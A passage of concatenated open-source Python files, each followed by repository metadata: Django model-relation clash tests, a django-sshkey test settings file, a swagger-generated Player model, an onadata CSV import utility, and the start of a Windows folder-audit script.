def test_hidden_fk_to_fk(self):
self.test_fk_to_fk(related_name='+')
def test_fk_to_m2m(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey(
'Target',
models.CASCADE,
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_fk_to_m2m(self):
self.test_fk_to_m2m(related_name='+')
def test_m2m_to_integer(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target', related_name=related_name, related_query_name='clash'))
def test_hidden_m2m_to_integer(self):
self.test_m2m_to_integer(related_name='+')
def test_m2m_to_fk(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target', related_name=related_name, related_query_name='clash'))
def test_hidden_m2m_to_fk(self):
self.test_m2m_to_fk(related_name='+')
def test_m2m_to_m2m(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField(
'Target',
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_m2m_to_m2m(self):
self.test_m2m_to_m2m(related_name='+')
def _test_explicit_related_query_name_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
clash = target
class Model(models.Model):
rel = relative
self.assertEqual(Model.check(), [
Error(
"Reverse query name for 'Model.rel' clashes with field name 'Target.clash'.",
hint=(
"Rename field 'Target.clash', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E303',
),
])
@isolate_apps('invalid_models_tests')
class SelfReferentialM2MClashTests(SimpleTestCase):
def test_clash_between_accessors(self):
class Model(models.Model):
first_m2m = models.ManyToManyField('self', symmetrical=False)
second_m2m = models.ManyToManyField('self', symmetrical=False)
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.first_m2m' clashes with reverse accessor for 'Model.second_m2m'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.first_m2m' or 'Model.second_m2m'."
),
obj=Model._meta.get_field('first_m2m'),
id='fields.E304',
),
Error(
"Reverse accessor for 'Model.second_m2m' clashes with reverse accessor for 'Model.first_m2m'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.second_m2m' or 'Model.first_m2m'."
),
obj=Model._meta.get_field('second_m2m'),
id='fields.E304',
),
])
def test_accessor_clash(self):
class Model(models.Model):
model_set = models.ManyToManyField("self", symmetrical=False)
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.model_set' clashes with field name 'Model.model_set'.",
hint=(
"Rename field 'Model.model_set', or add/change a related_name "
"argument to the definition for field 'Model.model_set'."
),
obj=Model._meta.get_field('model_set'),
id='fields.E302',
),
])
def test_reverse_query_name_clash(self):
class Model(models.Model):
model = models.ManyToManyField("self", symmetrical=False)
self.assertEqual(Model.check(), [
Error(
"Reverse query name for 'Model.model' clashes with field name 'Model.model'.",
hint=(
"Rename field 'Model.model', or add/change a related_name "
"argument to the definition for field 'Model.model'."
),
obj=Model._meta.get_field('model'),
id='fields.E303',
),
])
def test_clash_under_explicit_related_name(self):
class Model(models.Model):
clash = models.IntegerField()
m2m = models.ManyToManyField("self", symmetrical=False, related_name='clash')
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.m2m' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.m2m'."
),
obj=Model._meta.get_field('m2m'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.m2m' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.m2m'."
),
obj=Model._meta.get_field('m2m'),
id='fields.E303',
),
])
def test_valid_model(self):
class Model(models.Model):
first = models.ManyToManyField("self", symmetrical=False, related_name='first_accessor')
second = models.ManyToManyField("self", symmetrical=False, related_name='second_accessor')
self.assertEqual(Model.check(), [])
@isolate_apps('invalid_models_tests')
class SelfReferentialFKClashTests(SimpleTestCase):
def test_accessor_clash(self):
class Model(models.Model):
model_set = models.ForeignKey("Model", models.CASCADE)
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.model_set' clashes with field name 'Model.model_set'.",
hint=(
"Rename field 'Model.model_set', or add/change "
"a related_name argument to the definition "
"for field 'Model.model_set'."
),
obj=Model._meta.get_field('model_set'),
id='fields.E302',
),
])
def test_reverse_query_name_clash(self):
class Model(models.Model):
model = models.ForeignKey("Model", models.CASCADE)
self.assertEqual(Model.check(), [
Error(
"Reverse query name for 'Model.model' clashes with field name 'Model.model'.",
hint=(
"Rename field 'Model.model', or add/change a related_name "
"argument to the definition for field 'Model.model'."
),
obj=Model._meta.get_field('model'),
id='fields.E303',
),
])
def test_clash_under_explicit_related_name(self):
class Model(models.Model):
clash = models.CharField(max_length=10)
foreign = models.ForeignKey("Model", models.CASCADE, related_name='clash')
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.foreign' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.foreign'."
),
obj=Model._meta.get_field('foreign'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.foreign' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.foreign'."
),
obj=Model._meta.get_field('foreign'),
id='fields.E303',
),
])
@isolate_apps('invalid_models_tests')
class ComplexClashTests(SimpleTestCase):
# New tests should not be included here, because this is a single,
# self-contained sanity check, not a test of everything.
def test_complex_clash(self):
class Target(models.Model):
tgt_safe = models.CharField(max_length=10)
clash = models.CharField(max_length=10)
model = models.CharField(max_length=10)
clash1_set = models.CharField(max_length=10)
class Model(models.Model):
src_safe = models.CharField(max_length=10)
foreign_1 = models.ForeignKey(Target, models.CASCADE, related_name='id')
foreign_2 = models.ForeignKey(Target, models.CASCADE, related_name='src_safe')
m2m_1 = models.ManyToManyField(Target, related_name='id')
m2m_2 = models.ManyToManyField(Target, related_name='src_safe')
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.foreign_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.foreign_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.foreign_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.foreign_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E303',
),
Error(
"Reverse accessor for 'Model.foreign_1' clashes with reverse accessor for 'Model.m2m_1'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.foreign_1' or 'Model.m2m_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.foreign_1' clashes with reverse query name for 'Model.m2m_1'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.foreign_1' or 'Model.m2m_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E305',
),
Error(
"Reverse accessor for 'Model.foreign_2' clashes with reverse accessor for 'Model.m2m_2'.",
hint=("Add or change a related_name argument "
"to the definition for 'Model.foreign_2' or 'Model.m2m_2'."),
obj=Model._meta.get_field('foreign_2'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.foreign_2' clashes with reverse query name for 'Model.m2m_2'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.foreign_2' or 'Model.m2m_2'."),
obj=Model._meta.get_field('foreign_2'),
id='fields.E305',
),
Error(
"Reverse accessor for 'Model.m2m_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.m2m_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.m2m_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.m2m_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E303',
),
Error(
"Reverse accessor for 'Model.m2m_1' clashes with reverse accessor for 'Model.foreign_1'.",
hint=("Add or change a related_name argument to the definition "
"for 'Model.m2m_1' or 'Model.foreign_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.m2m_1' clashes with reverse query name for 'Model.foreign_1'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.m2m_1' or 'Model.foreign_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E305',
),
Error(
"Reverse accessor for 'Model.m2m_2' clashes with reverse accessor for 'Model.foreign_2'.",
hint=("Add or change a related_name argument to the definition "
"for 'Model.m2m_2' or 'Model.foreign_2'."),
obj=Model._meta.get_field('m2m_2'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.m2m_2' clashes with reverse query name for 'Model.foreign_2'.",
hint=("Add or change a related_name argument to the definition "
"for 'Model.m2m_2' or 'Model.foreign_2'."),
obj=Model._meta.get_field('m2m_2'),
id='fields.E305',
),
])
def test_clash_parent_link(self):
class Parent(models.Model):
pass
class Child(Parent):
other_parent = models.OneToOneField(Parent, models.CASCADE)
errors = [
('fields.E304', 'accessor', 'parent_ptr', 'other_parent'),
('fields.E305', 'query name', 'parent_ptr', 'other_parent'),
('fields.E304', 'accessor', 'other_parent', 'parent_ptr'),
('fields.E305', 'query name', 'other_parent', 'parent_ptr'),
]
self.assertEqual(Child.check(), [
Error(
"Reverse %s for 'Child.%s' clashes with reverse %s for "
"'Child.%s'." % (attr, field_name, attr, clash_name),
hint=(
"Add or change a related_name argument to the definition "
"for 'Child.%s' or 'Child.%s'." % (field_name, clash_name)
),
obj=Child._meta.get_field(field_name),
id=error_id,
)
for error_id, attr, field_name, clash_name in errors
])
@isolate_apps('invalid_models_tests')
class M2mThroughFieldsTests(SimpleTestCase):
def test_m2m_field_argument_validation(self):
"""
ManyToManyField accepts the ``through_fields`` kwarg
only if an intermediary table is specified.
"""
class Fan(models.Model):
pass
with self.assertRaisesMessage(ValueError, 'Cannot specify through_fields without a through model'):
models.ManyToManyField(Fan, through_fields=('f1', 'f2'))
def test_invalid_order(self):
"""
Mixing up the order of link fields to ManyToManyField.through_fields
triggers validation errors.
"""
class Fan(models.Model):
pass
class Event(models.Model):
invitees = models.ManyToManyField(Fan, through='Invitation', through_fields=('invitee', 'event'))
class Invitation(models.Model):
event = models.ForeignKey(Event, models.CASCADE)
invitee = models.ForeignKey(Fan, models.CASCADE)
inviter = models.ForeignKey(Fan, models.CASCADE, related_name='+')
field = Event._meta.get_field('invitees')
self.assertEqual(field.check(from_model=Event), [
Error(
"'Invitation.invitee' is not a foreign key to 'Event'.",
hint="Did you mean one of the following foreign keys to 'Event': event?",
obj=field,
id='fields.E339',
),
Error(
"'Invitation.event' is not a foreign key to 'Fan'.",
hint="Did you mean one of the following foreign keys to 'Fan': invitee, inviter?",
obj=field,
id='fields.E339',
),
])
def test_invalid_field(self):
"""
Providing invalid field names to ManyToManyField.through_fields
triggers validation errors.
"""
class Fan(models.Model):
pass
class Event(models.Model):
invitees = models.ManyToManyField(
Fan,
through='Invitation',
through_fields=('invalid_field_1', 'invalid_field_2'),
)
class Invitation(models.Model):
event = models.ForeignKey(Event, models.CASCADE)
invitee = models.ForeignKey(Fan, models.CASCADE)
inviter = models.ForeignKey(Fan, models.CASCADE, related_name='+')
field = Event._meta.get_field('invitees')
self.assertEqual(field.check(from_model=Event), [
Error(
"The intermediary model 'invalid_models_tests.Invitation' has no field 'invalid_field_1'.",
hint="Did you mean one of the following foreign keys to 'Event': event?",
obj=field,
id='fields.E338',
),
Error(
"The intermediary model 'invalid_models_tests.Invitation' has no field 'invalid_field_2'.",
hint="Did you mean one of the following foreign keys to 'Fan': invitee, inviter?",
obj=field,
id='fields.E338',
),
])
def test_explicit_field_names(self):
"""
If ``through_fields`` kwarg is given, it must specify both
link fields of the intermediary table.
"""
class Fan(models.Model):
pass
class Event(models.Model):
invitees = models.ManyToManyField(Fan, through='Invitation', through_fields=(None, 'invitee'))
class Invitation(models.Model):
event = models.ForeignKey(Event, models.CASCADE)
invitee = models.ForeignKey(Fan, models.CASCADE)
inviter = models.ForeignKey(Fan, models.CASCADE, related_name='+')
field = Event._meta.get_field('invitees')
self.assertEqual(field.check(from_model=Event), [
Error(
"Field specifies 'through_fields' but does not provide the names "
"of the two link fields that should be used for the relation "
"through model 'invalid_models_tests.Invitation'.",
hint="Make sure you specify 'through_fields' as through_fields=('field1', 'field2')",
obj=field,
id='fields.E337',
),
])
def test_superset_foreign_object(self):
class Parent(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
c = models.PositiveIntegerField()
class Meta:
unique_together = (('a', 'b', 'c'),)
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
value = models.CharField(max_length=255)
parent = ForeignObject(
Parent,
on_delete=models.SET_NULL,
from_fields=('a', 'b'),
to_fields=('a', 'b'),
related_name='children',
)
field = Child._meta.get_field('parent')
self.assertEqual(field.check(from_model=Child), [
Error(
"No subset of the fields 'a', 'b' on model 'Parent' is unique.",
hint=(
"Add unique=True on any of those fields or add at least "
"a subset of them to a unique_together constraint."
),
obj=field,
id='fields.E310',
),
])
def test_intersection_foreign_object(self):
class Parent(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
c = models.PositiveIntegerField()
d = models.PositiveIntegerField()
class Meta:
unique_together = (('a', 'b', 'c'),)
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
d = models.PositiveIntegerField()
value = models.CharField(max_length=255)
parent = ForeignObject(
Parent,
on_delete=models.SET_NULL,
from_fields=('a', 'b', 'd'),
to_fields=('a', 'b', 'd'),
related_name='children',
)
field = Child._meta.get_field('parent')
self.assertEqual(field.check(from_model=Child), [
Error(
"No subset of the fields 'a', 'b', 'd' on model 'Parent' is unique.",
hint=(
"Add unique=True on any of those fields or add at least "
"a subset of them to a unique_together constraint."
),
obj=field,
id='fields.E310',
),
])
| {
"content_hash": "41da2f058c67fd5b20a5a1646fb0bedf",
"timestamp": "",
"source": "github",
"line_count": 1499,
"max_line_length": 111,
"avg_line_length": 38.09873248832555,
"alnum_prop": 0.547995097180879,
"repo_name": "simonw/django",
"id": "786573672f38555576a75a47b13586f2c0ddd929",
"size": "57118",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/invalid_models_tests/test_relative_fields.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "85351"
},
{
"name": "HTML",
"bytes": "227641"
},
{
"name": "JavaScript",
"bytes": "258434"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "13501540"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "142"
}
],
"symlink_target": ""
} |
import getpass
import socket
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DEFAULT_FROM_EMAIL = '%s@%s' % (getpass.getuser(), socket.gethostname())
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'test.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/{{ docs_version }}/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/New_York'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '^t!$t$&%g!dzo!2ig40v1tgk95$ed^i&h7w(ydg&adkdkc8wvn'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'testproject.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
'templates',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.admindocs',
'south',
'django_sshkey',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
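# A minimal sketch of how one might exercise these settings locally (assumes the
# pre-Django-1.7 toolchain this project targets, with South installed as above;
# commands are standard manage.py invocations, not part of this file):
#   python manage.py syncdb --settings=testproject.settings
#   python manage.py migrate --settings=testproject.settings
#   python manage.py runserver --settings=testproject.settings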
| {
"content_hash": "5399e26ba0221794a092c8702013e364",
"timestamp": "",
"source": "github",
"line_count": 153,
"max_line_length": 122,
"avg_line_length": 34.22222222222222,
"alnum_prop": 0.6844919786096256,
"repo_name": "opennode/django-sshkey",
"id": "90e5eeee1ed91857dd5ccef02e5ce90b3caa16f9",
"size": "5280",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "testproject/settings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "67020"
},
{
"name": "Shell",
"bytes": "8234"
}
],
"symlink_target": ""
} |
from __future__ import division, absolute_import, print_function
from future.builtins import super
from iris_sdk.models.base_resource import BaseResource
from iris_sdk.models.data.sip_peer import SipPeerData
from iris_sdk.models.data.address import Address
from iris_sdk.models.data.calling_name import CallingName
from iris_sdk.models.data.hosts import Hosts
from iris_sdk.models.data.termination_hosts import TerminationHosts
from iris_sdk.models.maps.sip_peer import SipPeerMap
from iris_sdk.models.movetns import Movetns
from iris_sdk.models.sip_peer_tns import SipPeerTns
from iris_sdk.models.sip_peer_totaltns import SipPeerTotaltns
XPATH_SIP_PEER = "/{}"
class SipPeer(BaseResource, SipPeerData):
"""Site SIP peer"""
_xpath = XPATH_SIP_PEER
@property
def id(self):
return self.peer_id
@id.setter
def id(self, id):
self.peer_id = id
@property
def movetns(self):
return self._movetns
@property
def tns(self):
return self._tns
@property
def totaltns(self):
return self._totaltns
def __init__(self, parent=None, client=None):
super().__init__(parent, client)
SipPeerData.__init__(self)
self._movetns = Movetns(self, client)
self._tns = SipPeerTns(self, client)
self._totaltns = SipPeerTotaltns(self, client)
def get(self, id=None):
        return self._get_data(id)
| {
"content_hash": "0ee316c2c879bdbe14fe42842746122e",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 67,
"avg_line_length": 28.3,
"alnum_prop": 0.6946996466431096,
"repo_name": "scottbarstow/iris-python",
"id": "6ced3eb946a71372ab2b19fa5912a7af06e2fc14",
"size": "1438",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "iris_sdk/models/sip_peer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "308732"
}
],
"symlink_target": ""
} |
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 2.0.21
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class Player(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, url=None, manifest=None):
"""
Player - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'url': 'str',
'manifest': 'object'
}
self.attribute_map = {
'url': 'url',
'manifest': 'manifest'
}
self._url = url
self._manifest = manifest
@property
def url(self):
"""
Gets the url of this Player.
:return: The url of this Player.
:rtype: str
"""
return self._url
@url.setter
def url(self, url):
"""
Sets the url of this Player.
:param url: The url of this Player.
:type: str
"""
self._url = url
@property
def manifest(self):
"""
Gets the manifest of this Player.
:return: The manifest of this Player.
:rtype: object
"""
return self._manifest
@manifest.setter
def manifest(self, manifest):
"""
Sets the manifest of this Player.
:param manifest: The manifest of this Player.
:type: object
"""
self._manifest = manifest
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
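# Illustrative usage sketch (not part of the generated module; field values are made up):
#   player = Player(url='https://example.com/player.html', manifest={'hls': 'stream.m3u8'})
#   player.to_dict()  # -> {'url': 'https://example.com/player.html', 'manifest': {...}}
#   print(player)     # pretty-printed via to_str()/__repr__()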
| {
"content_hash": "3e0c190254cf0878e8f11857df9b3433",
"timestamp": "",
"source": "github",
"line_count": 134,
"max_line_length": 77,
"avg_line_length": 24.059701492537314,
"alnum_prop": 0.49503722084367247,
"repo_name": "kinow-io/kinow-python-sdk",
"id": "c5f4c9cc2eb3565c41785b5ae96db88b040f2791",
"size": "3241",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kinow_client/models/player.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "4659182"
},
{
"name": "Shell",
"bytes": "1666"
}
],
"symlink_target": ""
} |
import unicodecsv as ucsv
import uuid
import json
import cStringIO
from datetime import datetime
from django.contrib.auth.models import User
from onadata.libs.utils.logger_tools import dict2xml, safe_create_instance
from onadata.apps.logger.models import Instance
def get_submission_meta_dict(xform, instance_id):
"""Generates metadata for our submission
Checks if `instance_id` belongs to an existing submission.
If it does, it's considered an edit and its uuid gets deprecated.
In either case, a new one is generated and assigned.
:param onadata.apps.logger.models.XForm xform: The submission's XForm.
:param string instance_id: The submission/instance `uuid`.
:return: The metadata dict
:rtype: dict
"""
uuid_arg = 'uuid:{}'.format(uuid.uuid4())
meta = {'instanceID': uuid_arg}
update = 0
if xform.instances.filter(uuid=instance_id).count() > 0:
uuid_arg = 'uuid:{}'.format(uuid.uuid4())
meta.update({'instanceID': uuid_arg,
'deprecatedID': 'uuid:{}'.format(instance_id)})
update += 1
return [meta, update]
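# Illustrative sketch of the return value (not part of the original module):
#   - new submission:  [{'instanceID': 'uuid:<fresh-uuid>'}, 0]
#   - edit of an existing instance_id:
#       [{'instanceID': 'uuid:<fresh-uuid>', 'deprecatedID': 'uuid:<instance_id>'}, 1]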
def dict2xmlsubmission(submission_dict, xform, instance_id, submission_date):
    """Creates an xml submission from an appropriate dict (& other data)
:param dict submission_dict: A dict containing form submission data.
    :param onadata.apps.logger.models.XForm xform: The submission's XForm.
:param string instance_id: The submission/instance `uuid`.
:param string submission_date: An isoformatted datetime string.
:return: An xml submission string
:rtype: string
"""
return (u'<?xml version="1.0" ?>'
'<{0} id="{1}" instanceID="uuid:{2}" submissionDate="{3}" '
'xmlns="http://opendatakit.org/submissions">{4}'
'</{0}>'.format(
json.loads(xform.json).get('name', xform.id_string),
xform.id_string, instance_id, submission_date,
dict2xml(submission_dict).replace('\n', '')))
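# Hypothetical shape of the generated envelope (the form name 'survey' and the
# id 'survey_id' below are illustrative only):
#   dict2xmlsubmission({'age': '34'}, xform, 'abc-123', '2015-01-01T00:00:00')
#   -> '<?xml version="1.0" ?><survey id="survey_id" instanceID="uuid:abc-123"
#       submissionDate="2015-01-01T00:00:00"
#       xmlns="http://opendatakit.org/submissions"><age>34</age></survey>'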
def submit_csv(username, xform, csv_file):
""" Imports CSV data to an existing form
Takes a csv formatted file or string containing rows of submission/instance
and converts those to xml submissions and finally submits them by calling
:py:func:`onadata.libs.utils.logger_tools.safe_create_instance`
    :param str username: the submission user
    :param onadata.apps.logger.models.XForm xform: The submission's XForm.
    :param (str or file): A CSV formatted file with submission rows.
    :return: If successful, a dict with import summary else dict with error str.
:rtype: Dict
"""
if isinstance(csv_file, (str, unicode)):
csv_file = cStringIO.StringIO(csv_file)
elif csv_file is None or not hasattr(csv_file, 'read'):
return {'error': (u'Invalid param type for `csv_file`. '
'Expected file or String '
'got {} instead.'.format(type(csv_file).__name__))}
csv_reader = ucsv.DictReader(csv_file)
rollback_uuids = []
submission_time = datetime.utcnow().isoformat()
ona_uuid = {'formhub': {'uuid': xform.uuid}}
error = None
additions = inserts = 0
for row in csv_reader:
# fetch submission uuid before purging row metadata
row_uuid = row.get('_uuid')
submitted_by = row.get('_submitted_by')
submission_date = row.get('_submission_time', submission_time)
for key in row.keys(): # seems faster than a comprehension
# remove metadata (keys starting with '_')
if key.startswith('_'):
del row[key]
# process nested data e.g x[formhub/uuid] => x[formhub][uuid]
if r'/' in key:
p, c = key.split('/')
row[p] = {c: row[key]}
del row[key]
# inject our form's uuid into the submission
row.update(ona_uuid)
old_meta = row.get('meta', {})
new_meta, update = get_submission_meta_dict(xform, row_uuid)
inserts += update
old_meta.update(new_meta)
row.update({'meta': old_meta})
row_uuid = row.get('meta').get('instanceID')
rollback_uuids.append(row_uuid.replace('uuid:', ''))
xml_file = cStringIO.StringIO(dict2xmlsubmission(row, xform, row_uuid,
submission_date))
try:
error, instance = safe_create_instance(username, xml_file, [],
xform.uuid, None)
except ValueError as e:
error = e
if error:
Instance.objects.filter(uuid__in=rollback_uuids,
xform=xform).delete()
return {'error': str(error)}
else:
additions += 1
users = User.objects.filter(
username=submitted_by) if submitted_by else []
if users:
instance.user = users[0]
instance.save()
return {'additions': additions - inserts, 'updates': inserts}
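# Minimal usage sketch (the objects and names below are illustrative, not from this module):
#   xform = XForm.objects.get(id_string='household_survey', user__username='bob')
#   with open('household_survey.csv') as f:
#       summary = submit_csv('bob', xform, f.read())
#   # summary -> {'additions': 12, 'updates': 3} on success, or {'error': '...'}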
| {
"content_hash": "62fb0756d6fd1541e6d5fec650a11968",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 79,
"avg_line_length": 38.097744360902254,
"alnum_prop": 0.6050917702782712,
"repo_name": "awemulya/fieldsight-kobocat",
"id": "3c5a7a487d035a4732f389dfda47b6be81f14428",
"size": "5067",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "onadata/libs/utils/csv_import.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "70153"
},
{
"name": "Dockerfile",
"bytes": "2462"
},
{
"name": "HTML",
"bytes": "1488442"
},
{
"name": "JavaScript",
"bytes": "674757"
},
{
"name": "Makefile",
"bytes": "2286"
},
{
"name": "Python",
"bytes": "5340355"
},
{
"name": "Shell",
"bytes": "16493"
}
],
"symlink_target": ""
} |
#win_notify
'''
This will set up your computer to enable auditing for the folders specified in a yaml file. It will
then scan the event log for changes to those folders every 5 minutes and report when it finds one.
'''
from __future__ import absolute_import
import collections
import datetime
import fnmatch
import logging
import threading
import os
import glob
import yaml
